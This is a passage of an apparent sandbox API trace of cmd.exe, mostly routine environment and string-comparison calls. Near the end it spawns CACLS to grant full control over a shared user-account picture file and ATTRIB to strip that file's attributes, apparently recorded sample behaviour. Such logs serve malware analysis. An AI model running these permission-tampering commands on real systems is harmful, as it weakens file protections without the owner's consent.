lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.631] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.631] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0189.631] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0189.631] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0189.631] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0189.631] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0189.631] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0189.631] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0189.631] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0189.631] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0189.631] GetEnvironmentStringsW () returned 0x3e2458* [0189.631] FreeEnvironmentStringsW (penv=0x3e2458) returned 1 [0189.631] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.631] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.631] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0189.631] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0189.631] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0189.632] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0189.632] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0189.632] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0189.632] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0189.632] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0189.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f7f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.632] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f7f0, lpFilePart=0x20f7ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f7ec*="Desktop") returned 0x18 [0189.632] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.632] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f56c | out: lpFindFileData=0x20f56c) returned 0x3e0ae8 [0189.632] FindClose (in: hFindFile=0x3e0ae8 | out: hFindFile=0x3e0ae8) returned 1 [0189.632] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f56c | out: lpFindFileData=0x20f56c) returned 0x3e0ae8 [0189.632] FindClose (in: hFindFile=0x3e0ae8 | out: hFindFile=0x3e0ae8) returned 1 [0189.632] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f56c | out: lpFindFileData=0x20f56c) returned 0x3e0ae8 [0189.632] FindClose (in: hFindFile=0x3e0ae8 | out: hFindFile=0x3e0ae8) returned 1 [0189.632] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.632] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0189.633] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0189.633] GetEnvironmentStringsW () returned 0x3e0308* [0189.634] FreeEnvironmentStringsW (penv=0x3e0308) returned 1 [0189.634] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.634] GetConsoleOutputCP () returned 0x1b5 [0189.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.634] GetUserDefaultLCID () returned 0x409 [0189.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0189.634] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x20f930, cchData=128 | out: lpLCData="0") returned 2 [0189.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f930, cchData=128 | out: lpLCData="0") returned 2 [0189.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f930, cchData=128 | out: lpLCData="1") returned 2 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0189.635] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0189.636] GetConsoleTitleW (in: lpConsoleTitle=0x3d09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.636] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0189.636] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0189.636] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0189.637] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0189.637] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0189.637] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0189.637] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0189.637] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0189.637] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0189.637] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0189.637] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0189.640] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0189.640] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0189.640] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0189.640] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0189.640] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0189.640] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0189.640] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0189.643] GetConsoleTitleW (in: lpConsoleTitle=0x20f5c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.643] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.643] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.643] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.643] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.643] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.643] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.643] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.643] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.643] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.643] 
_wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.643] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.643] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.643] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.643] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.643] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.643] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.643] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.643] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.643] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.643] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.643] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.643] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.643] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.643] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.643] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.643] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.644] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.644] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.644] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.644] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 
[0189.644] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.644] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.644] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.644] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.644] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.644] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.644] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.644] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.644] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.644] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.644] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.644] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.644] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.644] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.644] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.644] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.644] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.644] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.644] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.644] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.644] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.644] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 
[0189.644] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.645] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.645] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.645] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.645] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.645] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.645] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.645] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.645] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.645] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.645] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.645] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.645] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.645] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0189.645] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0189.645] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0189.645] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0189.646] SetErrorMode (uMode=0x0) returned 0x0 [0189.646] SetErrorMode (uMode=0x1) returned 0x0 [0189.646] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3e1e98, lpFilePart=0x20f0e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f0e4*="Desktop") returned 0x18 [0189.646] SetErrorMode (uMode=0x0) returned 0x1 [0189.646] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.646] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.661] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.661] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.662] GetLastError () returned 0x2 [0189.662] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.662] GetLastError () returned 0x2 [0189.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0x3e2180 [0189.662] FindClose (in: hFindFile=0x3e2180 | out: hFindFile=0x3e2180) returned 1 [0189.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.662] GetLastError () returned 0x2 [0189.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0x3e2180 [0189.662] FindClose (in: hFindFile=0x3e2180 | out: hFindFile=0x3e2180) returned 1 [0189.663] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.663] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.663] GetConsoleTitleW (in: 
lpConsoleTitle=0x20f358, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.663] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f1e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f2a8 | out: lpAttributeList=0x20f1e0, lpSize=0x20f2a8) returned 1 [0189.663] UpdateProcThreadAttribute (in: lpAttributeList=0x20f1e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f2a0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f1e0, lpPreviousValue=0x0) returned 1 [0189.663] GetStartupInfoW (in: lpStartupInfo=0x20f19c | out: lpStartupInfo=0x20f19c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.663] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.664] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f23c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f288 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G EEBsYm5:F /C ", 
lpProcessInformation=0x20f288*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9e0, dwThreadId=0xfcc)) returned 1 [0189.666] CloseHandle (hObject=0x4c) returned 1 [0189.666] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.666] GetEnvironmentStringsW () returned 0x3e0308* [0189.666] FreeEnvironmentStringsW (penv=0x3e0308) returned 1 [0189.666] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0189.697] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f17c | out: lpExitCode=0x20f17c*=0x0) returned 1 [0189.697] CloseHandle (hObject=0x50) returned 1 [0189.697] _vsnwprintf (in: _Buffer=0x20f2c4, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f188 | out: _Buffer="00000000") returned 8 [0189.697] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.697] GetEnvironmentStringsW () returned 0x3e2410* [0189.697] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.697] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.697] GetEnvironmentStringsW () returned 0x3e2410* [0189.697] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.697] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f1e0 | out: lpAttributeList=0x20f1e0) [0189.697] GetConsoleTitleW (in: lpConsoleTitle=0x20f5c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.698] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.698] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.698] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.698] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20ee60, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.698] GetLastError () returned 0x2 [0189.698] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.698] GetLastError () returned 0x2 [0189.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0x3de4d8 [0189.698] FindClose (in: hFindFile=0x3de4d8 | out: hFindFile=0x3de4d8) returned 1 [0189.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.699] GetLastError () returned 0x2 [0189.699] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0x3de4d8 [0189.699] FindClose (in: hFindFile=0x3de4d8 | out: hFindFile=0x3de4d8) returned 1 [0189.699] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.699] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.699] GetConsoleTitleW (in: lpConsoleTitle=0x20f358, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.699] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f1e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f2a8 | out: lpAttributeList=0x20f1e0, lpSize=0x20f2a8) returned 1 [0189.699] UpdateProcThreadAttribute (in: lpAttributeList=0x20f1e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f2a0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f1e0, 
lpPreviousValue=0x0) returned 1 [0189.699] GetStartupInfoW (in: lpStartupInfo=0x20f19c | out: lpStartupInfo=0x20f19c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.699] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.699] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f23c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f288 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", lpProcessInformation=0x20f288*(hProcess=0x4c, hThread=0x50, dwProcessId=0xaa8, dwThreadId=0xa98)) returned 1 [0189.701] CloseHandle (hObject=0x50) returned 1 [0189.701] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.701] GetEnvironmentStringsW () returned 0x3e2410* [0189.701] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.701] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0189.784] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f17c | out: 
lpExitCode=0x20f17c*=0x0) returned 1 [0189.784] CloseHandle (hObject=0x4c) returned 1 [0189.784] _vsnwprintf (in: _Buffer=0x20f2c4, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f188 | out: _Buffer="00000000") returned 8 [0189.784] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.784] GetEnvironmentStringsW () returned 0x3e2410* [0189.784] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.784] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.784] GetEnvironmentStringsW () returned 0x3e2410* [0189.784] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.784] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f1e0 | out: lpAttributeList=0x20f1e0) [0189.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.784] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.785] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.785] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.785] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.785] SetConsoleInputExeNameW () returned 0x1 [0189.785] GetConsoleOutputCP () returned 0x1b5 [0189.785] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.785] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.785] exit (_Code=0) Process: id = "416" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0x9e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "415" os_parent_pid = "0x5dc" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" 
